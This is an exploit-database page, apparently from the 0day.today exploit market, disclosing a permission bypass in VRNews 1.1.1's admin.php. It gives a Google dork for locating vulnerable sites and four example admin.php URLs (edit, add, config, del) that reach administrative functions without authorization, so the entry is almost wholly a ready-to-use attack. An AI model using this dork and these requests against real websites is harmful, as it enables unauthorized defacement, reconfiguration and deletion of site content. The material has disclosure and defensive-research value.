[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

VRNews 1.1.1 (admin.php) Remote Permission Bypass Vulnerability

Author
R4M!
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2006
Category
web applications
Date add
04-07-2007
Platform
unsorted
===============================================================
VRNews 1.1.1 (admin.php) Remote Permission Bypass Vulnerability
===============================================================



VRNews v1.x <= /VRNews/admin.php Permission
 
Found by: R4M!
 
Dork: intitle:"vrnews v1"
 
Example:
1. /VRNews/admin.php?act=edit
2. /VRNews/admin.php?act=add
3. /VRNews/admin.php?act=config
4. /VRNews/admin.php?act=del



#  0day.today [2024-11-14]  #